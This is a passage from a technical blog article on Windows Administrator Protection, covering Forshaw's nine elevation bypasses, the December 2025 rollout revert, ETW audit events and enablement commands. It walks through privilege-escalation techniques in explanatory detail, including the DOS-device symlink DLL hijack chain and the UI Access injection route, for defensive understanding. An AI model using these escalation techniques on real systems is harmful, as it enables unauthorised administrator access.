The MSRC servicing-criteria definition of a security boundary: a logical separation between code or data of different trust levels, intended to be enforced by the operating system and accompanied by a Microsoft commitment to issue a security update when an unauthorised crossing is found. UAC under the classic split-token model is classified as a *security feature*, not a boundary; bypasses receive quality-fix attention but not security-bulletin attention. Administrator Protection is the first elevation mechanism classified as a security boundary, with bulletin-grade fixes when it fails [@msrc-servicing-criteria, @forshaw-pz-jan2026].
&lt;p&gt;&lt;strong&gt;Admin equals kernel.&lt;/strong&gt; Once code is running inside an SMAA elevated process, it has the local Administrators group; it can write to &lt;code&gt;HKLM&lt;/code&gt;; it can install services; it can load WHQL-signed drivers; it can call into kernel-mode interfaces gated by &lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt; and the App Control for Business policy. The MSRC servicing-criteria position that &quot;admin-to-kernel is not a security boundary&quot; continues to apply inside the SMAA [@msrc-servicing-criteria]. Administrator Protection makes the path &lt;em&gt;to&lt;/em&gt; admin into a boundary; it does not change the relationship between admin and kernel. Driver-loading controls remain the domain of WHQL signing, the Microsoft Vulnerable Driver Blocklist (default-on in Windows 11 since the 2022 update), App Control for Business policies, and Hypervisor-protected Code Integrity (HVCI) [@ms-vuln-driver-blocklist]. The &lt;a href=&quot;https://paragmali.com/blog/windows-app-identity-33-year-reinvention/&quot; rel=&quot;noopener&quot;&gt;App Identity article&lt;/a&gt; in this series covers the App Control mechanism in detail.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The SMAA is in the local Administrators group.&lt;/strong&gt; Discretionary access control list-based exposures of admin-only resources -- &lt;code&gt;CREATOR OWNER&lt;/code&gt; ACEs on persistent objects, world-writable DACLs on certain &lt;code&gt;\Sessions\0\DosDevices&lt;/code&gt; entries, default-permissive ACLs on a handful of legacy registry trees -- still grant the SMAA full access. The boundary is between &lt;em&gt;standard user&lt;/em&gt; and &lt;em&gt;SMAA&lt;/em&gt;, not between &lt;em&gt;SMAA&lt;/em&gt; and &lt;em&gt;SYSTEM&lt;/em&gt;. The SMAA is a high-privilege actor inside the operating system; the relationship between it and the rest of the privileged surface is unchanged.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Out of scope per Microsoft Learn.&lt;/strong&gt; Remote logon, roaming profiles, backup-admin accounts, Managed Service Accounts and group Managed Service Accounts (MSAs and gMSAs), virtual accounts for services, and domain-admin scenarios are explicitly outside the Administrator Protection model in its current form [@ms-admin-protection]. The feature is local-machine-only, interactive-admin-only. Domain administrators who log into a workstation will not see the SMAA path; service accounts under &lt;code&gt;LOCAL SERVICE&lt;/code&gt;, &lt;code&gt;NETWORK SERVICE&lt;/code&gt;, or &lt;code&gt;IIS_IUSRS&lt;/code&gt; are unaffected.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; A genuine architectural ceiling on consent-prompt elevation: the prompt is a UI element; the boundary is the credential gate; the gate is only as strong as the user&apos;s resistance to social engineering. Closing the gap requires out-of-band consent (smartcard, phone push) or per-action policy without human consent in the loop (EPM&apos;s automatic mode). Neither is the default.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Four limits, four sentences. The next section walks the concrete evidence of what actually leaked in the pre-GA Insider Preview builds, and what Microsoft did about it.&lt;/p&gt;
&lt;h2&gt;12. Forshaw&apos;s nine bypasses, classified&lt;/h2&gt;
&lt;p&gt;Between October 2024, when Administrator Protection first appeared in Insider Preview build 27718, and October 2025, when KB5067036 made the feature available on stable Windows, James Forshaw of Google Project Zero audited the mechanism and found nine separate silent-bypass paths. Microsoft fixed all nine -- either in the KB5067036 ship or in subsequent security bulletins [@forshaw-pz-jan2026]. The fact pattern is the structural confirmation that Administrator Protection is now treated as a security boundary. Under the UAC classification, none of those nine would have received CVEs. Each one would have been a quality bug. The bypass canon ran for twenty years without bulletins. The fact that the first cohort of Administrator Protection bypasses produced nine bulletin-eligible fixes is exactly the change in posture the classification change implies.&lt;/p&gt;

All the issues that I reported to Microsoft have been fixed, either prior to the feature being officially released (in optional update KB5067036) or as subsequent security bulletins. -- James Forshaw, *Bypassing Windows Administrator Protection*, Google Project Zero, January 26, 2026 [@forshaw-pz-jan2026]
&lt;p&gt;Walk the nine as three classes.&lt;/p&gt;
&lt;h3&gt;The lazy DOS device directory hijack&lt;/h3&gt;
&lt;p&gt;The single most interesting vulnerability in the feature&apos;s history; Forshaw&apos;s January 26, 2026 deep analysis [@forshaw-pz-jan2026]; Project Zero issue 432313668 [@pz-issue-432313668]. The mechanism turns on a behaviour change Administrator Protection itself introduced. Every SMAA elevation gets a &lt;em&gt;fresh&lt;/em&gt; logon session, which means the per-logon-session DOS device object directory at &lt;code&gt;\Sessions\0\DosDevices\&amp;lt;LUID&amp;gt;&lt;/code&gt; is not created at SMAA logon time. The kernel routine &lt;code&gt;SeGetTokenDeviceMap&lt;/code&gt; creates the directory &lt;em&gt;lazily&lt;/em&gt;, on the first reference. The owner of the new directory is the owner of the access token that triggered the creation [@forshaw-pz-jan2026, @theregister-2026].&lt;/p&gt;

The impersonation level (`SecurityIdentification`) at which an impersonating thread can read security information about the impersonated token -- the SID set, the privilege set -- but cannot perform privileged operations or open kernel objects as the impersonated user. The kernel allows access checks to consult an identification-level token for *reading* the security information; certain code paths inadvertently use that information for *granting* operations, which is the structural primitive Forshaw&apos;s lazy DOS device directory exploit depends on [@forshaw-pz-jan2026].
&lt;p&gt;The &lt;code&gt;SECURITY_IMPERSONATION_LEVEL&lt;/code&gt; enumeration in &lt;code&gt;winnt.h&lt;/code&gt; defines four levels in ascending order: &lt;code&gt;SecurityAnonymous&lt;/code&gt; (value 0), &lt;code&gt;SecurityIdentification&lt;/code&gt; (1), &lt;code&gt;SecurityImpersonation&lt;/code&gt; (2), &lt;code&gt;SecurityDelegation&lt;/code&gt; (3). &lt;code&gt;SecurityIdentification&lt;/code&gt; is the second-lowest -- it sits one above &lt;code&gt;SecurityAnonymous&lt;/code&gt; -- and is the level Windows uses when it wants to ask the kernel &quot;what would this token be allowed to do?&quot; without actually doing the operation. The trap is when a code path that runs &lt;em&gt;as the caller&lt;/em&gt; uses an identification-level impersonation to read a token property -- here, the linked-token field -- and the resulting object inherits the caller&apos;s owner SID rather than the impersonated token&apos;s.&lt;/p&gt;
&lt;p&gt;The exploit chain. An attacker running as the primary user (filtered token, Medium integrity) starts an elevation. Before the SMAA process touches its DOS device directory, the attacker impersonates the SMAA&apos;s &lt;code&gt;TokenLinkedToken&lt;/code&gt; at identification level and triggers a code path that walks the directory. The kernel creates &lt;code&gt;\Sessions\0\DosDevices\&amp;lt;SMAA_LUID&amp;gt;&lt;/code&gt; lazily; in the affected code path, the owner of the new directory becomes the attacker&apos;s primary token&apos;s owner SID rather than the SMAA&apos;s.&lt;/p&gt;
&lt;p&gt;The attacker plants a &lt;code&gt;C:&lt;/code&gt; symbolic link inside the directory pointing at an attacker-controlled location. When the elevated SMAA process loads its DLLs, the resolution walks &lt;code&gt;\Sessions\0\DosDevices\&amp;lt;SMAA_LUID&amp;gt;\C:&lt;/code&gt; first; the symlink redirects the load to the attacker&apos;s directory; the attacker&apos;s DLL runs in the High-integrity SMAA process [@forshaw-pz-jan2026].&lt;/p&gt;

sequenceDiagram
    participant Att as Attacker (limited user)
    participant Kern as &quot;Kernel (SeGetTokenDeviceMap)&quot;
    participant SMAA as SMAA elevated process&lt;pre&gt;&lt;code&gt;Note over SMAA: Fresh logon session -- DOS device dir not yet created
Att-&amp;gt;&amp;gt;Att: Impersonate SMAA TokenLinkedToken at Identification level
Att-&amp;gt;&amp;gt;Kern: Reference \Sessions\0\DosDevices\&amp;lt;SMAA_LUID&amp;gt;
Kern-&amp;gt;&amp;gt;Kern: Lazy-create directory
Note over Kern: Owner SID inherited from impersonating token
Att-&amp;gt;&amp;gt;Kern: Create C: symlink under attacker control
SMAA-&amp;gt;&amp;gt;Kern: Resolve C: at first DLL load
Kern--&amp;gt;&amp;gt;SMAA: Returns attacker symlink target
SMAA-&amp;gt;&amp;gt;SMAA: Load attacker DLL at High integrity
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What makes this bypass extraordinary is that it is &lt;em&gt;caused by&lt;/em&gt; the feature&apos;s design. Pre-Administrator-Protection, the user&apos;s primary logon session was created at desktop logon and the DOS device directory existed before any elevation. Lazy directory creation never came up. The SMAA design&apos;s &quot;fresh logon session per elevation&quot; property -- the same property Forshaw&apos;s January 2026 pull-quote in §7 establishes via the credential-less LSA logon -- is exactly the precondition the lazy-creation path exploits.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s pre-GA fix has two parts. First, the manifest-parsing access check uses the SYSTEM-impersonating-the-low-user identity rather than the user&apos;s primary token. Second, the DOS device directory is materialised with the correct owner before any user-controlled code path can trigger the lazy-creation path [@forshaw-pz-jan2026]. The Register&apos;s coverage of the disclosure noted &quot;the most notable of the nine bugs he reported was a Logon Sessions flaw that relied upon five different Windows behaviors. He added that he likely only found it because he was previously familiar with the OS&apos;s &apos;weird behavior when creating the DOS device object directory&apos;&quot; [@theregister-2026].&lt;/p&gt;
&lt;h3&gt;The five UI Access bypasses&lt;/h3&gt;
&lt;p&gt;Forshaw&apos;s February 2026 post details the second class, comprising five of the nine bypasses [@forshaw-pz-feb2026]. UI Access is a token flag retrofitted in Vista to let accessibility applications cross UIPI. To qualify, an executable needs three things: a manifest declaring &lt;code&gt;uiAccess=&quot;true&quot;&lt;/code&gt;, a trusted code-signing certificate, and an installation location under an administrator-only directory (typically &lt;code&gt;%ProgramFiles%&lt;/code&gt;). The Application Information service&apos;s &lt;code&gt;RAiLaunchAdminProcess&lt;/code&gt; endpoint launches qualifying UI Access processes &lt;em&gt;without showing the consent prompt&lt;/em&gt;, on the theory that the three-criteria check is itself sufficient evidence of administrator approval [@forshaw-pz-feb2026].&lt;/p&gt;

The token flag (`TOKEN_UIACCESS`) that allows a process to interact with windows of higher integrity level than its own, bypassing User Interface Privilege Isolation. UI Access is meant for accessibility software (screen readers, on-screen keyboards) that needs to interact with elevated UI. To qualify, an executable must carry a `uiAccess=&quot;true&quot;` manifest, a trusted code-signing certificate, and an administrator-only installation directory; qualifying processes run without showing the consent prompt and at integrity level High [@forshaw-pz-feb2026].
&lt;p&gt;Under classic UAC, a UI Access process ran with the filtered standard-user token bumped from Medium to High integrity -- not with the full admin token. Forshaw&apos;s February 2026 post states the mechanism verbatim: &quot;the service will take a copy of the caller&apos;s access token, enable the UI Access flag and increase the integrity level... If the caller is a limited user of an UAC administrator it will set the integrity level to High&quot; [@forshaw-pz-feb2026].&lt;/p&gt;
&lt;p&gt;Under Administrator Protection, the pre-GA design preserved that behaviour unchanged: the UI Access process inherited the limited user&apos;s primary token (not the SMAA&apos;s), bumped to High integrity. That decision was the structural flaw. A High-integrity process under the limited user can interact with the SMAA&apos;s windows whenever a High-integrity SMAA process exists on the same desktop, send messages to them, read clipboard data, and -- through &lt;code&gt;GetProcessHandleFromHwnd&lt;/code&gt; -- obtain a process handle on the SMAA process that lets the limited-user process inject code into it.&lt;/p&gt;
&lt;p&gt;The five UI Access variants exploit different sub-categories of the same structural property. The Quick Assist binary, a remote assistance application on Windows 10 and 11 that carries the uiAccess flag, is one such variant; R41N3RZUF477 published a public proof-of-concept that exploits the &lt;code&gt;BrowserExecutableFolder&lt;/code&gt; group policy to make Quick Assist load WebView2 from an attacker-controlled directory [@quickassist-bypass]. The remaining four exploit, respectively, weaknesses in the secure-application-directory check, the manifest parsing routine, COM marshalling in UI Access contexts, and message-only window handling [@forshaw-pz-feb2026].&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s pre-GA fix is structural: UI Access processes no longer run as the limited user. They are created with a &lt;em&gt;filtered copy of the SMAA&apos;s token&lt;/em&gt; (the SMAA&apos;s SID, the SMAA&apos;s profile, but with &lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt; and similar removed). Profile separation is restored at the cost of a more complex token-creation path [@forshaw-pz-feb2026].&lt;/p&gt;
&lt;h3&gt;The remaining three: implementation flaws&lt;/h3&gt;
&lt;p&gt;The third class -- three bypasses described by Forshaw only as &quot;implementation flaws and long-standing UAC issues&quot; -- is not detailed publicly [@forshaw-pz-jan2026]. The article does not invent details. Forshaw names the category and cites the framing; the engineering specifics are presumably in Microsoft Security Response Center advisories or are still under disclosure. What can be said is that two of the three appear from Forshaw&apos;s framing to be UAC-era bugs that Administrator Protection inherited rather than introduced, and one is an Administrator-Protection-specific implementation flaw.&lt;/p&gt;
&lt;p&gt;The bypass canon ran for twenty years without bulletins. The fact that all nine pre-GA Administrator Protection bypasses received fixes -- including a deep one rooted in the feature itself -- is the structural confirmation that the elevation path is now a boundary. The next section asks why Microsoft pulled the feature in December 2025.&lt;/p&gt;
&lt;h2&gt;13. The compatibility surface and the December 2025 revert&lt;/h2&gt;
&lt;p&gt;About one month after KB5067036 made Administrator Protection available, Microsoft pulled it. Forshaw, writing in January 2026, gives the canonical attribution: &quot;As of 1st December 2025 the Administrator Protection feature has been disabled by Microsoft while an application compatibility issue is dealt with. The issue is unlikely to be related to anything described in this blog post so the analysis doesn&apos;t change&quot; [@forshaw-pz-jan2026]. Microsoft Learn confirms: &quot;The feature previously listed in the October 2025 non-security update (KB5067036) has been reverted and will roll out at a later date&quot; [@ms-admin-protection, @ms-kb5067036].The November 2025 KB5067036 amendment is worth knowing. Microsoft included an unrelated fix for an AutoCAD MSI-repair UAC-prompt regression in the same cumulative; that fix shipped and was not reverted. The WebView2 installer regression is what caused the Administrator Protection revert specifically [@ms-kb5067036].&lt;/p&gt;
&lt;p&gt;The structural causes. The Windows Developer Blog (May 2025) [@ms-developer-blog-2025] enumerates the surface where applications break under the SMAA model.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Single sign-on does not cross.&lt;/strong&gt; Domain and Microsoft Entra credentials cached for the primary user&apos;s session are not available inside the SMAA&apos;s session. Any elevated process touching Microsoft Graph, Entra ID, or Kerberos-protected resources must re-authenticate. The login dialogs an elevated installer triggers are not failures of the application; they are consequences of the separated logon session.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Network drives do not carry.&lt;/strong&gt; Drive-mapping in the primary user&apos;s session is not inherited by the SMAA. Installers that mount network shares to install per-machine components break. The workaround for affected installers is to use UNC paths directly rather than drive letters.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Library folders diverge.&lt;/strong&gt; Files saved to &lt;code&gt;Documents&lt;/code&gt;, &lt;code&gt;Desktop&lt;/code&gt;, &lt;code&gt;Downloads&lt;/code&gt;, or &lt;code&gt;Pictures&lt;/code&gt; from an elevated app land in &lt;code&gt;C:\Users\ADMIN_&amp;lt;random&amp;gt;\&lt;/code&gt; rather than the primary user&apos;s home. A user clicks Save in an elevated text editor and saves to &quot;Documents&quot;; from their own Explorer, the file is invisible.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;HKCU diverges.&lt;/strong&gt; Application settings -- theme, recent-files lists, per-user COM registrations, last-opened paths -- live in the SMAA&apos;s &lt;code&gt;HKCU&lt;/code&gt;, not the primary user&apos;s. The canonical example in Microsoft&apos;s documentation is Notepad&apos;s dark-mode theme [@ms-developer-blog-2025]: the primary user sets the theme; an elevated Notepad opens in the default theme; the two sessions never agree.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;WebView2 installers fail.&lt;/strong&gt; The error message &quot;Microsoft Edge can&apos;t read and write to its data directory&quot; is the recognisable symptom of an installer that assumes one shared profile. The WebView2 runtime stores per-user state in &lt;code&gt;AppData\Local\Microsoft\EdgeWebView\&lt;/code&gt; under whichever profile is active at install time; if the runtime is installed under the SMAA&apos;s profile and then used by an unelevated application running as the primary user, the data-directory write fails. This is the regression that triggered the December 2025 revert.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Hyper-V and WSL incompatibilities.&lt;/strong&gt; Microsoft Learn explicitly tells IT administrators not to enable Administrator Protection on devices that require Hyper-V or WSL [@ms-admin-protection].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Visual Studio.&lt;/strong&gt; Microsoft&apos;s own development environment is &quot;not supported in such a configuration&quot; when run elevated. Extensions don&apos;t carry; settings don&apos;t carry; project-dialog paths point at the SMAA&apos;s profile rather than the developer&apos;s actual workspace.&lt;/li&gt;
&lt;/ol&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft Learn explicitly excludes Hyper-V and WSL devices from the recommended enablement set [@ms-admin-protection]. Symptoms of incorrect enablement include WSL distribution startup failures (the WSL service runs under a different account from the launching user, and the SMAA&apos;s logon-session-isolation properties interact badly with WSL&apos;s named-pipe communication) and Hyper-V Manager connection errors that are difficult to attribute to the elevation model.&lt;/p&gt;
&lt;/blockquote&gt;

I guess app compatibility is ultimately the problem here, Windows isn&apos;t designed for such a radical change. I&apos;d have also liked to have seen this as a separate configurable mode rather than replacing admin-approval completely. -- James Forshaw, *Bypassing Windows Administrator Protection*, Google Project Zero, January 26, 2026 [@forshaw-pz-jan2026]

Administrator Protection is the right architecture, and the compatibility surface is the bill of materials for twenty years of admin-as-default assumption. Application developers have written installer logic, theme-persistence code, drive-letter assumptions, and HKCU-shared state into shipping software for two decades, on the structural premise that the elevated process and the unelevated user share a profile. The December 2025 revert is the first iteration&apos;s learning round, not a structural failure. The same revert pattern accompanied the Windows Vista UAC rollout in 2006-2007, the Windows 7 auto-elevation introduction in 2009 (which itself softened the Vista prompt fatigue at the cost of the bypass canon), and the Smart App Control rollout in Windows 11 22H2. Microsoft will re-enable Administrator Protection when the WebView2 regression and a handful of installer-pattern fixes have shipped.
&lt;p&gt;The architecture survives audit. The deployment is held back by twenty years of accumulated software assumptions. The next section asks what tools defenders now have that they did not have before.&lt;/p&gt;
&lt;h2&gt;14. The audit and detection surface&lt;/h2&gt;
&lt;p&gt;Every privileged operation on a device with Administrator Protection enabled now generates an ETW (Event Tracing for Windows) event in the &lt;code&gt;Microsoft-Windows-LUA&lt;/code&gt; provider [@ms-admin-protection]. This is the first time the elevation pipeline itself is the &lt;em&gt;source&lt;/em&gt; of a stable, operationally useful audit trail.&lt;/p&gt;
&lt;p&gt;The basics.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Provider: &lt;code&gt;Microsoft-Windows-LUA&lt;/code&gt;, GUID &lt;code&gt;{93c05d69-51a3-485e-877f-1806a8731346}&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Event ID 15031: Elevation Approved.&lt;/li&gt;
&lt;li&gt;Event ID 15032: Elevation Denied or Failed.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each event carries the caller user SID, the application name and path, the elevation outcome, the SMAA used to host the elevation, and the authentication method (Hello PIN, biometric, password) [@ms-admin-protection]. The authentication method field records the &lt;em&gt;primary user&apos;s&lt;/em&gt; Hello credential, not the SMAA&apos;s; the SMAA&apos;s authentication in step 6 of §7 is the credential-less LSA logon and has no method field of its own. The Microsoft Learn-documented &lt;code&gt;logman&lt;/code&gt; invocation to capture the trace is short:&lt;/p&gt;

The Event Tracing for Windows provider that surfaces Administrator Protection elevation events. Provider GUID `{93c05d69-51a3-485e-877f-1806a8731346}`. Event ID 15031 marks an elevation that succeeded; Event ID 15032 marks an elevation that was denied or failed. Each event carries fields for the caller&apos;s SID, the application path, the elevation outcome, the SMAA used, and the authentication method [@ms-admin-protection].
&lt;p&gt;{`
// Pseudocode for a detection pipeline that reads ETW Event 15031
// (Administrator Protection elevation approved) and flags unusual
// application paths per SMAA correlation key.&lt;/p&gt;
&lt;p&gt;const allowList = new Set([
  &apos;C:\\Windows\\System32\\mmc.exe&apos;,
  &apos;C:\\Windows\\System32\\regedit.exe&apos;,
  &apos;C:\\Windows\\System32\\cmd.exe&apos;,
  &apos;C:\\Program Files\\Microsoft VS Code\\Code.exe&apos;,
]);&lt;/p&gt;
&lt;p&gt;function onEtwEvent(event) {
  if (event.provider !== &apos;Microsoft-Windows-LUA&apos;) return;
  if (event.id !== 15031) return;&lt;/p&gt;
&lt;p&gt;  const smaa = event.fields.shadowAccountName;
  const app  = event.fields.applicationPath;
  const auth = event.fields.authenticationMethod;
  const user = event.fields.callerUserSid;&lt;/p&gt;
&lt;p&gt;  if (!allowList.has(app)) {
    emit({
      severity: &apos;high&apos;,
      title: &apos;Unexpected elevation under Administrator Protection&apos;,
      smaa, app, auth, user,
      hint: &apos;Was the Hello prompt phished?&apos;
    });
  }
}
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; For detection engineers, the &lt;code&gt;ADMIN_&amp;lt;random&amp;gt;&lt;/code&gt; name is the highest-value correlation key on the device. It is stable per primary admin (the SMAA name is created once and persists across elevations), distinct from the limited-user SID (the SMAA has its own SID, so user-by-SID correlations and SMAA-by-name correlations are independent axes), and present in every ETW 15031 / 15032 event. A detection rule that groups elevations by SMAA name and flags unexpected application paths is the canonical &quot;someone phished a Hello prompt&quot; alert pattern.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Defenders now have the audit trail they did not have under UAC. The next section asks what residual attack surface survives the SMAA architecture, the Hello gate, and the new audit trail.&lt;/p&gt;
&lt;h2&gt;15. Open problems: what survives&lt;/h2&gt;
&lt;p&gt;Five residual attack surfaces, each acknowledged in Microsoft&apos;s own documentation, Forshaw&apos;s Project Zero posts, or the operational literature on Windows privilege escalation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The user is still the weak link.&lt;/strong&gt; Every elevation depends on a human accepting the prompt. The Hello credential gate makes that human&apos;s decision more costly to fake than the classic Yes/No, but the gate does not change the fact that a successful prompt is a successful elevation. The three sub-cases of consent-without-identity-verification from §9 -- unattended-session, habituated-click, pretext click-through -- are cost-raised, not closed. Phishing-the-prompt remains a live attack surface and Microsoft does not classify it as a vulnerability [@forshaw-pz-jan2026]. Out-of-band consent -- a phone-push approval channel, a smartcard tap, a separate hardware key tap -- would close the gap; none of these is the Administrator Protection default.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Loopback authentication.&lt;/strong&gt; The structural property that Windows services authenticate to themselves over the local network stack is independent of the SMAA model. SMB to &lt;code&gt;localhost&lt;/code&gt;, Kerberos against the local machine account, NTLM challenge-response between processes on the same box -- these protocols predate UAC and are not changed by Administrator Protection. Forshaw&apos;s broader 2022 Kerberos research [@forshaw-2022-rbcd] catalogues the class. The &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLMless article&lt;/a&gt; in this series covers SMB signing, Extended Protection for Authentication (EPA), and channel binding mitigations that defenders should pair with Administrator Protection to close the loopback path.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Service-account &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt;.&lt;/strong&gt; The Potato lineage of attacks (cataloged in the &lt;a href=&quot;https://paragmali.com/blog/windows-access-control-25-years-of-attacks/&quot; rel=&quot;noopener&quot;&gt;Access Control article&lt;/a&gt; in this series) runs in service accounts (&lt;code&gt;IIS_IUSRS&lt;/code&gt;, &lt;code&gt;LOCAL SERVICE&lt;/code&gt;, &lt;code&gt;NETWORK SERVICE&lt;/code&gt;), not in interactive admin sessions. Administrator Protection scopes itself to interactive admin elevation; the Potato class is structurally out of scope.&lt;/p&gt;

Service-account Potato attacks run inside `IIS_IUSRS`, `LOCAL SERVICE`, and `NETWORK SERVICE` rather than in interactive admin sessions. The attacker has compromised a service that holds `SeImpersonatePrivilege`, then uses one of several primitives (the SSPI / NEGOEX dance, the EFS RPC interface, a printer-spooler endpoint) to coerce a higher-privileged service into authenticating against the attacker&apos;s local socket, and impersonates the resulting token. Administrator Protection&apos;s promise is around the *interactive elevation* path -- the flow from a logged-in user clicking an installer to an elevated process running. Potato is a separate problem class with its own mitigations: removing `SeImpersonatePrivilege` from service accounts that don&apos;t need it, applying EPA, and patching the named primitives one by one.
&lt;p&gt;&lt;strong&gt;Driver loading once inside an SMAA elevation.&lt;/strong&gt; Admin equals kernel applies once a process is running inside the SMAA. Vulnerable-driver loading, kernel-mode code execution, and rootkit installation fall under the §11 &quot;admin equals kernel&quot; ceiling -- WHQL signing, the Vulnerable Driver Blocklist, App Control for Business, and HVCI remain the four-mechanism mitigation surface, with the App Identity article in this series covering the App Control mechanism. Administrator Protection does not change the relationship between admin and kernel; it changes the relationship between standard user and admin.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The Hello credential phishing surface.&lt;/strong&gt; The prompt now phishes a &lt;em&gt;real credential&lt;/em&gt; rather than a click-through approval. A malicious application that successfully argues its case to the user gets a Hello gesture against the primary user&apos;s PIN or biometric. The credential remains hardware-rooted; ESS-engaged biometrics never leave the TPM or Pluton enclave; the malware does not learn the PIN. But the malware does get the elevation. The Windows Hello article in this series covers FIDO2 / ESS / PIN architecture hardening. Defender-side mitigation is the ETW 15031 / 15032 detection rule set on unexpected application paths [@ms-admin-protection].&lt;/p&gt;
&lt;p&gt;The boundary is real, the audit trail is new, and the five-class residual surface is the next decade of work. The next section turns to operator-side practicalities.&lt;/p&gt;
&lt;h2&gt;16. Practical guide&lt;/h2&gt;
&lt;p&gt;Six tips, each tied to one Microsoft Learn or Windows Developer Blog primary source. Remember that, as of December 2025, Microsoft has reverted the rollout and the feature is currently disabled on stable Windows; the guidance below applies once Microsoft re-enables it. The Spoiler below contains the verbatim commands.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Enable.&lt;/strong&gt; Set &lt;code&gt;TypeOfAdminApprovalMode = 2&lt;/code&gt; via Group Policy (&quot;User Account Control: Configure type of Admin Approval Mode&quot; -&amp;gt; &quot;Admin Approval Mode with Administrator Protection&quot;) or via the Intune Settings Catalog OMA-URI. A reboot is required for the new policy to take effect [@ms-admin-protection, @ms-kb5067036].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Verify.&lt;/strong&gt; Run &lt;code&gt;whoami&lt;/code&gt; in an elevated console. The profile name shows &lt;code&gt;ADMIN_&amp;lt;random&amp;gt;&lt;/code&gt;. Run &lt;code&gt;whoami /priv&lt;/code&gt; to confirm the SMAA has the Administrators group enabled [@ms-admin-protection, @call4cloud-osint].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Capture.&lt;/strong&gt; Start the ETW trace with the documented &lt;code&gt;logman&lt;/code&gt; invocation; filter for Event IDs 15031 and 15032 [@ms-admin-protection]. The provider GUID is stable across builds.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Do not enable&lt;/strong&gt; on devices that require Hyper-V or WSL. Re-evaluate when Microsoft re-enables the broad rollout [@ms-admin-protection, @forshaw-pz-jan2026].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;For application developers&lt;/strong&gt;, follow the Windows Developer Blog (May 19, 2025) guidance [@ms-developer-blog-2025]: install per-user packages unelevated; use &lt;code&gt;%ProgramFiles%&lt;/code&gt; (and accept the elevated install path); avoid context switching during install; avoid sharing files between elevated and unelevated profiles; remove auto-elevation dependencies. The auto-elevation manifest attribute is no longer honoured under Administrator Protection, so any installer that relied on silent elevation needs to be reworked.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;For IT admins&lt;/strong&gt; on already-enabled devices broken by an elevated install: disable Administrator Protection temporarily, reinstall the application unelevated, then re-enable [@ms-developer-blog-2025].&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Enable via Group Policy registry value (administrator console, persists across reboots):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;# Set TypeOfAdminApprovalMode to 2 (Admin Approval Mode with Administrator Protection)
reg add &quot;HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System&quot; /v TypeOfAdminApprovalMode /t REG_DWORD /d 2 /f
# Reboot required:
shutdown /r /t 0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Capture the elevation event trace:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-cmd&quot;&gt;logman start AdminProtectionTrace -p {93c05d69-51a3-485e-877f-1806a8731346} -ets
:: After some elevations:
logman stop AdminProtectionTrace -ets
:: Process the .etl with PerfView, Message Analyzer, or:
wevtutil qe Microsoft-Windows-LUA/Operational /q:&quot;*[System[(EventID=15031 or EventID=15032)]]&quot; /f:text
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Verify the SMAA presence after enablement:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;Get-LocalUser | Where-Object Name -like &apos;ADMIN_*&apos;
# After an elevation, run from the elevated console:
whoami
# Expect: WIN11-PC\ADMIN_&amp;lt;random16hex&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The single most common mistake in response to an Administrator Protection compatibility problem is to disable UAC globally by setting &lt;code&gt;EnableLUA = 0&lt;/code&gt;. This returns the device to the Windows XP single-token model, removes Mandatory Integrity Control enforcement on application processes, and effectively defeats every layer of UAC and Administrator Protection together. It is universally discouraged. The correct fix is per-application, via manifest, or per-device, via the documented Administrator Protection compatibility list.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Six tips, one boundary, one operational checklist. The next section answers the most common misconceptions.&lt;/p&gt;
&lt;h2&gt;17. Frequently asked questions&lt;/h2&gt;

